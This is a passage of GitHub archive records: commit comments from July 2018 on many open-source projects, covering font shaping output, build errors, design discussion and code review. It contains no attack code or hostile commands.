C:\\Windows\\Fonts\\Nirmala.ttf\r\n[gid302=0+532|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid274=0+1274]\r\n```\r\n\r\nU+091F,U+094D,U+200D,U+091F,U+094D,U+200C,U+091F,U+094D,U+200D,U+092F,U+093F\r\n```\r\n> hb-shape --shaper=ot -u U+091F,U+094D,U+200D,U+091F,U+094D,U+200C,U+091F,U+094D,U+200D,U+092F,U+093F C:\\Windows\\Fonts\\Nirmala.ttf\r\n[gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid258=3+1210|gid320=3@-129,0+0|gid3=3+0|gid302=6+532|gid258=6+1210|gid320=6@-129,0+0|gid3=6+0|gid274=6+1274]\r\n\r\n> hb-shape --shaper=uniscribe -u U+091F,U+094D,U+200D,U+091F,U+094D,U+200C,U+091F,U+094D,U+200D,U+092F,U+093F C:\\Windows\\Fonts\\Nirmala.ttf\r\n[gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid302=6+532|gid258=6+1210|gid320=6@-129,0+0|gid3=6+0|gid274=6+1274]\r\n```\r\n\r\nU+091F,U+094D,U+200D,U+091F,U+094D,U+200D,U+091F,U+094D,U+200D,U+092F,U+093F\r\n```\r\n> hb-shape --shaper=ot -u U+091F,U+094D,U+200D,U+091F,U+094D,U+200D,U+091F,U+094D,U+200D,U+092F,U+093F C:\\Windows\\Fonts\\Nirmala.ttf\r\n[gid302=0+532|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid274=0+1274]\r\n\r\n> hb-shape --shaper=uniscribe -u U+091F,U+094D,U+200D,U+091F,U+094D,U+200D,U+091F,U+094D,U+200D,U+092F,U+093F C:\\Windows\\Fonts\\Nirmala.ttf\r\n[gid302=0+532|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid258=0+1210|gid320=0@-129,0+0|gid3=0+0|gid274=0+1274]\r\n```\r\n\r\n"}},"created_at":"2018-07-04T17:45:55Z"}
{"id":"7919599452","type":"CommitCommentEvent","actor":{"login":"fredrikhgrelland"},"repo":{"name":"hortonworks/ansible-hortonworks"},"payload":{"comment":{"id":29598304,"position":null,"line":null,"path":null,"commit_id":"4d417373d5fbb1d9c9a1414316603fd57ffa6140","created_at":"2018-07-04T17:47:08Z","updated_at":"2018-07-04T17:47:08Z","author_association":"NONE","body":"This commit breaks the template.\r\n`\"msg\": \"AnsibleError: template error while templating string: expected token '=', got '.'`\r\n`ansible --version\r\nansible 2.4.2.0\r\n  config file = /etc/ansible/ansible.cfg\r\n  configured module search path = [u'/root/.ansible/plugins/modules', u'/usr/share/ansible/plugins/modules']\r\n  ansible python module location = /usr/lib/python2.7/site-packages/ansible\r\n  executable location = /usr/bin/ansible\r\n  python version = 2.7.5 (default, Apr 11 2018, 07:36:10) [GCC 4.8.5 20150623 (Red Hat 4.8.5-28)]`"}},"created_at":"2018-07-04T17:47:08Z"}
{"id":"7919601984","type":"CommitCommentEvent","actor":{"login":"eduperez"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29598310,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-04T17:48:07Z","updated_at":"2018-07-04T17:48:07Z","author_association":"NONE","body":"@p3x-robot I compile my own packages (you can find them at https://github.com/eduperez/mwlwifi_LEDE/releases/tag/d9daa1d), directly from the sources (both  LEDE/OpenWrt and this repo). Those packages you linked above have a date prior to this patch, are you sure they include the changes being discussed here?"}},"created_at":"2018-07-04T17:48:07Z"}
{"id":"7919604483","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29598312,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T17:48:57Z","updated_at":"2018-07-04T17:48:57Z","author_association":"OWNER","body":"I don't have any examples...  I mean a `QDefinition` that is not used in the context of something like `DD`, `IM`, etc. Basically one where you're forced to try to put a note in the `QDefinition` itself as there is nothing containing the `QDefinition` where the note can be attached to more meaningfully."}},"created_at":"2018-07-04T17:48:57Z"}
{"id":"7919606101","type":"CommitCommentEvent","actor":{"login":"rob-solana"},"repo":{"name":"solana-labs/solana"},"payload":{"comment":{"id":29598314,"position":53,"line":44,"path":".buildkite/hooks/post-command","commit_id":"99a62991018aaae0f6ad069b4340f0a685287ef0","created_at":"2018-07-04T17:49:34Z","updated_at":"2018-07-04T17:49:34Z","author_association":"CONTRIBUTOR","body":"extra quotes"}},"created_at":"2018-07-04T17:49:34Z"}
{"id":"7919606676","type":"CommitCommentEvent","actor":{"login":"rob-solana"},"repo":{"name":"solana-labs/solana"},"payload":{"comment":{"id":29598316,"position":15,"line":6,"path":".buildkite/hooks/post-command","commit_id":"99a62991018aaae0f6ad069b4340f0a685287ef0","created_at":"2018-07-04T17:49:46Z","updated_at":"2018-07-04T17:49:46Z","author_association":"CONTRIBUTOR","body":"extra quotes?"}},"created_at":"2018-07-04T17:49:46Z"}
{"id":"7919607168","type":"CommitCommentEvent","actor":{"login":"rob-solana"},"repo":{"name":"solana-labs/solana"},"payload":{"comment":{"id":29598317,"position":28,"line":19,"path":".buildkite/hooks/post-command","commit_id":"99a62991018aaae0f6ad069b4340f0a685287ef0","created_at":"2018-07-04T17:49:58Z","updated_at":"2018-07-04T17:49:58Z","author_association":"CONTRIBUTOR","body":"extea quotes?"}},"created_at":"2018-07-04T17:49:58Z"}
{"id":"7919609143","type":"CommitCommentEvent","actor":{"login":"rbardenet"},"repo":{"name":"guilgautier/DPPy"},"payload":{"comment":{"id":29598320,"position":null,"line":null,"path":null,"commit_id":"d074667fad0e246c81e410f78350d037ac2a580d","created_at":"2018-07-04T17:50:42Z","updated_at":"2018-07-04T17:50:42Z","author_association":"COLLABORATOR","body":"Do you remember how to tell travis to automatically rebuild? I've added the test instructions to the yml file, but travis seems inactive. I'd like to make sure the pipeline works before writing other tests."}},"created_at":"2018-07-04T17:50:42Z"}
{"id":"7919613482","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29598330,"position":null,"line":null,"path":null,"commit_id":"3171cd3ab3590ddd4700a49fe746f998aabb40b5","created_at":"2018-07-04T17:52:22Z","updated_at":"2018-07-04T17:52:22Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-04T17:52:22Z"}
{"id":"7919613506","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29598331,"position":null,"line":null,"path":null,"commit_id":"34d7226247f0c438940ad551e3822bde910b0b5d","created_at":"2018-07-04T17:52:22Z","updated_at":"2018-07-04T17:52:22Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-04T17:52:22Z"}
{"id":"7919615461","type":"CommitCommentEvent","actor":{"login":"mhhf"},"repo":{"name":"kframework/k"},"payload":{"comment":{"id":29598332,"position":null,"line":null,"path":null,"commit_id":"bafd06aa301a6f30a19dc3f08fdb8f5e2c4d1561","created_at":"2018-07-04T17:53:05Z","updated_at":"2018-07-04T17:53:05Z","author_association":"NONE","body":"definitely not empty. I'm added tags to some rules in evm-semantics and extract them already through this tag. You might want to look into writing a custom attribute toJson method as this approach combines them in to a monolithic string with junk inside."}},"created_at":"2018-07-04T17:53:05Z"}
{"id":"7919617405","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29598340,"position":null,"line":null,"path":null,"commit_id":"c01e9428cd7eee6ab3aae599e75750362f581992","created_at":"2018-07-04T17:53:48Z","updated_at":"2018-07-04T17:53:48Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Projet výjimky v adminu](https://trello.com/c/PDpj150K/636-2-projet-v%C3%BDjimky-v-adminu)"}},"created_at":"2018-07-04T17:53:48Z"}
{"id":"7919618753","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29598344,"position":null,"line":null,"path":null,"commit_id":"0a267bbd708a46970f2d93b0530f00d34d278cbd","created_at":"2018-07-04T17:54:17Z","updated_at":"2018-07-04T17:54:17Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Projet výjimky v adminu](https://trello.com/c/PDpj150K/636-2-projet-v%C3%BDjimky-v-adminu)"}},"created_at":"2018-07-04T17:54:17Z"}
{"id":"7919619412","type":"CommitCommentEvent","actor":{"login":"jeseal"},"repo":{"name":"jeseal/formato-ejercicio"},"payload":{"comment":{"id":29598347,"position":null,"line":null,"path":null,"commit_id":"5ae4450c44dd69eef46f2f4ba24cc25b1732ea15","created_at":"2018-07-04T17:54:31Z","updated_at":"2018-07-04T17:54:31Z","author_association":"OWNER","body":"El formato de la estructura de los ejercicios."}},"created_at":"2018-07-04T17:54:31Z"}
{"id":"7919619972","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29598350,"position":7,"line":385,"path":"src/libdrakvuf/drakvuf.c","commit_id":"7a9e60407fc9564e9b118ed208ad427470b04191","created_at":"2018-07-04T17:54:42Z","updated_at":"2018-07-04T17:54:42Z","author_association":"NONE","body":"I will have a closer look when I get home but on the first glimpse, I wonder why the function is called inject_trap_breakpoint instead of *_privcall :)"}},"created_at":"2018-07-04T17:54:42Z"}
{"id":"7919623098","type":"CommitCommentEvent","actor":{"login":"LnL7"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29598353,"position":null,"line":null,"path":null,"commit_id":"67d0a57ef9eedde69192e08db77751c1c1062e0e","created_at":"2018-07-04T17:55:46Z","updated_at":"2018-07-04T17:55:46Z","author_association":"CONTRIBUTOR","body":"I think this is causing ofborg checks to fail evaluation, because of `--option restrict-eval true`.\r\n\r\nhttps://gist.github.com/GrahamcOfBorg/ba122fc9085b30b1fbf42d509bcbd222"}},"created_at":"2018-07-04T17:55:46Z"}
{"id":"7919625812","type":"CommitCommentEvent","actor":{"login":"Thanatomanic"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29598358,"position":35,"line":4158,"path":"rtengine/procparams.cc","commit_id":"8c3e14b7f0a128d82369ebcbb88abe3ccb930c7d","created_at":"2018-07-04T17:56:49Z","updated_at":"2018-07-04T17:56:49Z","author_association":"CONTRIBUTOR","body":"I would very much prefer that upscaling is set to false for previous versions. In my mind this should have always been the correct behavior (and upscaling should be regarded as a bug, not a feature)."}},"created_at":"2018-07-04T17:56:49Z"}
{"id":"7919626870","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29598361,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T17:57:14Z","updated_at":"2018-07-04T17:57:14Z","author_association":"COLLABORATOR","body":"Ah, I think I see what you mean.`QDefinition` is just a building block for something more meaningful, in which case notes for \"something meaningful\" may not always make sense; so adding a `_notes` field to the building block isn't the best place to put it.\r\n\r\nHowever, since Data Definitions are \"created\" via these `QDefinition`s, there is no better place to tack on the notes than to create this `_notes` field and can thus continue to be used/implemented (right?). \r\n\r\nSince that is the case, I can add a `FIXME`/create an issue for thinking about your point about \"migrate from our document-centric view of DD (and other like items) to a more semantics-centric view\"."}},"created_at":"2018-07-04T17:57:14Z"}
{"id":"7919628925","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"AndriuCoelho/Formacao-iOS"},"payload":{"comment":{"id":29598366,"position":8,"line":43,"path":"Alura Viagens/Controllers/PacotesViagensViewController.swift","commit_id":"66daf93eea79f6db4936dcdf32c2e37cd6236612","created_at":"2018-07-04T17:58:01Z","updated_at":"2018-07-04T17:58:01Z","author_association":"NONE","body":"Se tem o early return, não é necessário o else :D"}},"created_at":"2018-07-04T17:58:01Z"}
{"id":"7919631499","type":"CommitCommentEvent","actor":{"login":"rafeayub"},"repo":{"name":"attwoodn/CourseTool"},"payload":{"comment":{"id":29598371,"position":null,"line":null,"path":null,"commit_id":"57ad4482c06b82f2bfe03ecb251d58ec2d021eea","created_at":"2018-07-04T17:58:59Z","updated_at":"2018-07-04T17:58:59Z","author_association":"COLLABORATOR","body":"& RA"}},"created_at":"2018-07-04T17:58:59Z"}
{"id":"7919631522","type":"CommitCommentEvent","actor":{"login":"MomenGhazouly"},"repo":{"name":"MomenGhazouly/Hello-world"},"payload":{"comment":{"id":29598372,"position":1,"line":1,"path":"README.md","commit_id":"ebc50f685acba1c4538e223207fec3acf01d6946","created_at":"2018-07-04T17:58:59Z","updated_at":"2018-07-04T17:58:59Z","author_association":"OWNER","body":"What do you think?"}},"created_at":"2018-07-04T17:58:59Z"}
{"id":"7919631714","type":"CommitCommentEvent","actor":{"login":"Xiloe"},"repo":{"name":"Woteck/TerraDev"},"payload":{"comment":{"id":29598373,"position":91,"line":208,"path":"bot.py","commit_id":"b3f2dd8a97051092c4c426bb9b9cf469c49e2d27","created_at":"2018-07-04T17:59:04Z","updated_at":"2018-07-04T17:59:04Z","author_association":"NONE","body":"# oe <3"}},"created_at":"2018-07-04T17:59:04Z"}
{"id":"7919632963","type":"CommitCommentEvent","actor":{"login":"Xiloe"},"repo":{"name":"Woteck/TerraDev"},"payload":{"comment":{"id":29598378,"position":null,"line":null,"path":null,"commit_id":"b3f2dd8a97051092c4c426bb9b9cf469c49e2d27","created_at":"2018-07-04T17:59:32Z","updated_at":"2018-07-04T17:59:32Z","author_association":"NONE","body":"waw"}},"created_at":"2018-07-04T17:59:32Z"}
{"id":"7919633397","type":"CommitCommentEvent","actor":{"login":"Xiloe"},"repo":{"name":"Woteck/TerraDev"},"payload":{"comment":{"id":29598379,"position":null,"line":null,"path":null,"commit_id":"b3f2dd8a97051092c4c426bb9b9cf469c49e2d27","created_at":"2018-07-04T17:59:42Z","updated_at":"2018-07-04T17:59:42Z","author_association":"NONE","body":"## C BO XDDDDD"}},"created_at":"2018-07-04T17:59:42Z"}
{"id":"7919633485","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598380,"position":6,"line":38,"path":"src/runtime/HalideRuntimeHexagonDma.h","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T17:59:44Z","updated_at":"2018-07-04T17:59:44Z","author_association":"NONE","body":"What is \"num\" for? number of DMA engines?\r\n\r\nThis should not be the case, as the allocated engine is a virtual engine which may have one or more real-engine(s) associated to it. And an app/host may have one or more virtual engines. The real-engines are in the engine pool.\r\n\r\nThe virtual engine normally is a 1:1 relation to a real engine. Its only 1:N when the workload is partitioned into N pieces and then each workload piece is parallelized. Given that Hexagon has limited number of HW threads M, only M threads (meaning maximum of M pieces of workload) can be active at any time. Thus, putting a ceiling of 1:M in virtual to real engine association. For Hana, M=4.\r\n\r\nThe pooling concept is to hold the needed number of real engines that is allocated as needed (can grow/expand) and provided to virtual engines as needed before start of that piece of workload and returned to the pool after end of that workload piece.\r\nThe pool also holds the real engine(s) so that the allocation is persistent across the host lifetime and not the pipeline lifetime, as the pipeline is called for each set of image frame to process.\r\n\r\nHope this helps to clarify the concept on the engine pool.\r\n"}},"created_at":"2018-07-04T17:59:44Z"}
{"id":"7919634013","type":"CommitCommentEvent","actor":{"login":"LnL7"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29598382,"position":null,"line":null,"path":null,"commit_id":"67d0a57ef9eedde69192e08db77751c1c1062e0e","created_at":"2018-07-04T17:59:57Z","updated_at":"2018-07-04T17:59:57Z","author_association":"CONTRIBUTOR","body":"Yeah, ofborg uses the release.nix for the tarball check.\r\n\r\nhttps://github.com/NixOS/ofborg/blob/88899d853cc49b08025f680ff82f2137c6d44783/ofborg/src/tasks/massrebuilder.rs#L368"}},"created_at":"2018-07-04T17:59:57Z"}
{"id":"7919636315","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29598396,"position":22,"line":22,"path":"lesson7/validation_methods.rb","commit_id":"c4c0eeee5e8b8f764cf89d03750dda170bea2111","created_at":"2018-07-04T18:00:44Z","updated_at":"2018-07-04T18:00:44Z","author_association":"NONE","body":"тру зачем-то оставил здесь"}},"created_at":"2018-07-04T18:00:44Z"}
{"id":"7919638228","type":"CommitCommentEvent","actor":{"login":"RafalZietek"},"repo":{"name":"RafalZietek/Pokaz-StroneSwiatu"},"payload":{"comment":{"id":29598398,"position":null,"line":null,"path":null,"commit_id":"7b80397d727e28cf8decad5271bfae1a3ed5469f","created_at":"2018-07-04T18:01:26Z","updated_at":"2018-07-04T18:01:26Z","author_association":"OWNER","body":"Add head"}},"created_at":"2018-07-04T18:01:26Z"}
{"id":"7919641355","type":"CommitCommentEvent","actor":{"login":"johnataylor"},"repo":{"name":"Microsoft/botbuilder-dotnet"},"payload":{"comment":{"id":29598403,"position":null,"line":null,"path":null,"commit_id":"fc266e378a8c4e3d97eb2b19b68d600b0183e4d6","created_at":"2018-07-04T18:02:31Z","updated_at":"2018-07-04T18:02:31Z","author_association":"CONTRIBUTOR","body":"Yes absolutely, the current state is a little confusing because master has diverged significantly from the published packages. The decision was to make the samples (see the folder currently called \"samples-final\") depend on the publish packages. We should get this all synced up by mid July.\r\n\r\nWe are also setting up a MyGet feed that should contain nightly. Perhaps we could have a branch of the samples that were in sync with that?\r\n\r\nNote the CatchException middleware is also gone, replaced with an error handler on the adapter. Currently middleware is still used for the send typing... in fact we just updated that to add cancellation.\r\n\r\nWe also need to sync these changes with the TypeScript.\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-04T18:02:31Z"}
{"id":"7919641811","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598406,"position":13,"line":19,"path":"src/runtime/hexagon_dma.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:02:42Z","updated_at":"2018-07-04T18:02:42Z","author_association":"NONE","body":"see previous comment on engine pool. thus, pool is per host and not per buffer - same concept to cache_memory pool"}},"created_at":"2018-07-04T18:02:42Z"}
{"id":"7919641972","type":"CommitCommentEvent","actor":{"login":"John1987vlc"},"repo":{"name":"EnriqueRqox/dapda"},"payload":{"comment":{"id":29598408,"position":null,"line":null,"path":null,"commit_id":"2eafa11242c6d2ade9fbc0ecb1e7632fb7ce33ae","created_at":"2018-07-04T18:02:46Z","updated_at":"2018-07-04T18:02:46Z","author_association":"NONE","body":"Hola Enrique. Me gustaría poder hablar contigo. No encuentro como poder escribirte directamente.\r\nforo201025@gmail.com creo que podemos ya no colaborar si no ganar dinero juntos. Gracias"}},"created_at":"2018-07-04T18:02:46Z"}
{"id":"7919642359","type":"CommitCommentEvent","actor":{"login":"Karthik99999"},"repo":{"name":"ElijahZAwesome/web-cfw-loader"},"payload":{"comment":{"id":29598409,"position":null,"line":null,"path":null,"commit_id":"9d415cfe54fcac590867d70ca59ec5cd3468f9ef","created_at":"2018-07-04T18:02:54Z","updated_at":"2018-07-04T18:02:54Z","author_association":"NONE","body":"You might want to change the id of CTCaer’s Hekate btw (That was probably my fault on my pull request to add CTCaer’s Hekate)"}},"created_at":"2018-07-04T18:02:54Z"}
{"id":"7919644034","type":"CommitCommentEvent","actor":{"login":"StudentBlake"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29598414,"position":null,"line":null,"path":null,"commit_id":"109bed26c6e81037a89798d392788fcd8b2b2dd7","created_at":"2018-07-04T18:03:33Z","updated_at":"2018-07-04T18:03:33Z","author_association":"CONTRIBUTOR","body":"No problem, I really like this project! I'm sorry I didn't consider this case. Can you compile and test with this new version and see if it still does it? Seems to work okay for me, but I don't have a huge library in folders.\r\nhttps://github.com/StudentBlake/XCI-Organizer/archive/master.zip"}},"created_at":"2018-07-04T18:03:33Z"}
{"id":"7919647594","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29598417,"position":6,"line":770,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T18:05:00Z","updated_at":"2018-07-04T18:05:00Z","author_association":"OWNER","body":"Little problem: using `check-unit-y` I get linker error, it does not find almost all functions that were needed. I am probably missing something.\r\n```\r\nlibqgraph-obj-y = $(libqos-pc-obj-y) tests/qgraph/qgraph.o\r\n\r\ncheck-qtest-pci-y += tests/test-qgraph$(EXESUF)\r\ntests/test-qgraph$(EXESUF): tests/test-qgraph.o $(libqgraph-obj-y)\r\n```\r\nworks, while\r\n```\r\nlibqgraph-obj-y = $(libqos-pc-obj-y) tests/qgraph/qgraph.o\r\n\r\ncheck-unit-y += tests/test-qgraph$(EXESUF)\r\ntests/test-qgraph$(EXESUF): tests/test-qgraph.o $(libqgraph-obj-y)\r\n```\r\nproduces linker errors `undefined reference to ....`"}},"created_at":"2018-07-04T18:05:00Z"}
{"id":"7919648755","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29598419,"position":null,"line":null,"path":null,"commit_id":"8a53941fe06b6cf65d83926ac2f29df398b83733","created_at":"2018-07-04T18:05:28Z","updated_at":"2018-07-04T18:05:28Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/over-aggressive-gmail-eliding/90853/5\n"}},"created_at":"2018-07-04T18:05:28Z"}
{"id":"7919649327","type":"CommitCommentEvent","actor":{"login":"xMAC94x"},"repo":{"name":"treenix/game"},"payload":{"comment":{"id":29598420,"position":52,"line":213,"path":"voxygen/src/game.rs","commit_id":"467f1c508236a7528fa4b0b931a6470d1287280c","created_at":"2018-07-04T18:05:41Z","updated_at":"2018-07-04T18:05:41Z","author_association":"NONE","body":"why remove CHUNK_SIZE here?\r\n"}},"created_at":"2018-07-04T18:05:41Z"}
{"id":"7919650923","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29598423,"position":186,"line":186,"path":"lesson7/interface.rb","commit_id":"c4c0eeee5e8b8f764cf89d03750dda170bea2111","created_at":"2018-07-04T18:06:20Z","updated_at":"2018-07-04T18:06:20Z","author_association":"NONE","body":"ты конечно спрятал валидацию в модуль... но суть не поменялась ))\r\nв интерфейсе доступны методы, которые там доступны быть не должны\r\nправильно эту ситуацию было бы решить так:\r\n- создать объект класса КаргоТрейн\r\n- валидацию `train_id_free?(id)` вызвать среди прочих в классе, а не здесь\r\n- если прилетит ошибка - здесь ее перехватить и ретрайнуть ввод номера"}},"created_at":"2018-07-04T18:06:20Z"}
{"id":"7919656204","type":"CommitCommentEvent","actor":{"login":"think2k18green"},"repo":{"name":"protegeproject/facsimile"},"payload":{"comment":{"id":29598435,"position":null,"line":null,"path":null,"commit_id":"c9ed8556399488fe4d92864fb88c9150113579fe","created_at":"2018-07-04T18:08:26Z","updated_at":"2018-07-04T18:08:26Z","author_association":"NONE","body":"hello everyone\r\nim completely new in semantic web \r\ncould you please help me that can i develop interface for semantic web or not?\r\nif i can which technology should i use?"}},"created_at":"2018-07-04T18:08:26Z"}
{"id":"7919656522","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598438,"position":12,"line":12,"path":"src/runtime/hexagon_dma_pool.h","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:08:34Z","updated_at":"2018-07-04T18:08:34Z","author_association":"NONE","body":"Better naming is *_allocate_from_* and *_free_to_* to get/put real engines from/to engine pool. And *_create_dma_pool and *_delete_dma_pool to manage the engine pool lifetime. All these APIs should be transparent to user host code, and only used privately by hexagon_dma code."}},"created_at":"2018-07-04T18:08:34Z"}
{"id":"7919659205","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29598446,"position":186,"line":186,"path":"lesson7/interface.rb","commit_id":"c4c0eeee5e8b8f764cf89d03750dda170bea2111","created_at":"2018-07-04T18:09:36Z","updated_at":"2018-07-04T18:09:36Z","author_association":"NONE","body":"код примерно такой:\r\n```ruby\r\n  ....\r\n  cargo_train = CargoTrain.new(id)\r\nrescue ...\r\n  ....\r\n  retry\r\n  train_created_message(id)\r\n\r\n```\r\n"}},"created_at":"2018-07-04T18:09:36Z"}
{"id":"7919659851","type":"CommitCommentEvent","actor":{"login":"ctjithinkrishna"},"repo":{"name":"inventit/processing-android-serial"},"payload":{"comment":{"id":29598448,"position":null,"line":null,"path":null,"commit_id":"64ed31c362edcf777f03069d2fa6e52e4fb50815","created_at":"2018-07-04T18:09:51Z","updated_at":"2018-07-04T18:09:51Z","author_association":"NONE","body":"I have seen that you have added device filter for CH340, Is it working with inventit library."}},"created_at":"2018-07-04T18:09:51Z"}
{"id":"7919661892","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"whiskeysierra/compass"},"payload":{"comment":{"id":29598452,"position":null,"line":null,"path":null,"commit_id":"63464ed65f77d868f8e442114955ce8b5bc00ab4","created_at":"2018-07-04T18:10:36Z","updated_at":"2018-07-04T18:10:36Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #169 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-04T18:10:36Z"}
{"id":"7919663252","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29598453,"position":186,"line":186,"path":"lesson7/interface.rb","commit_id":"c4c0eeee5e8b8f764cf89d03750dda170bea2111","created_at":"2018-07-04T18:11:07Z","updated_at":"2018-07-04T18:11:07Z","author_association":"NONE","body":"в таком варианте Интерфейс выполняет только свою работу\r\nпринимает ввод, отправляет команду на создание объекта, если объект создан - извещает об этом, если проверка в классе завершилась ошибкой и объект не создан - выводит ошибку и просит повторить ввод"}},"created_at":"2018-07-04T18:11:07Z"}
{"id":"7919663992","type":"CommitCommentEvent","actor":{"login":"AndroidLollipop"},"repo":{"name":"AndroidLollipop/RSI-ASR-App"},"payload":{"comment":{"id":29598454,"position":null,"line":null,"path":null,"commit_id":"c37f810a20282ca5c5302b32843404cbde4dc9d0","created_at":"2018-07-04T18:11:23Z","updated_at":"2018-07-04T18:11:23Z","author_association":"OWNER","body":"I changed my name to Browsing? What a surprise! /padparadscha"}},"created_at":"2018-07-04T18:11:23Z"}
{"id":"7919664602","type":"CommitCommentEvent","actor":{"login":"mclow"},"repo":{"name":"boostorg/mpi"},"payload":{"comment":{"id":29598455,"position":null,"line":null,"path":null,"commit_id":"30f32d531932809e3122fdeebbea629023854eeb","created_at":"2018-07-04T18:11:38Z","updated_at":"2018-07-04T18:11:38Z","author_association":"NONE","body":"This says that it was merged into `develop`, but it was merged into `master`.\r\n"}},"created_at":"2018-07-04T18:11:38Z"}
{"id":"7919665284","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29598457,"position":25,"line":47,"path":"docs/chapters/rules.tex","commit_id":"a78aa4f6a2c6d0db554a6ae00996a1d955ba81e9","created_at":"2018-07-04T18:11:56Z","updated_at":"2018-07-04T18:11:56Z","author_association":"OWNER","body":"Actually, the default value here is about the `bib2gls` behaviour, and not exactly coming from the rule itself, hence why it is not explicitly marked..."}},"created_at":"2018-07-04T18:11:56Z"}
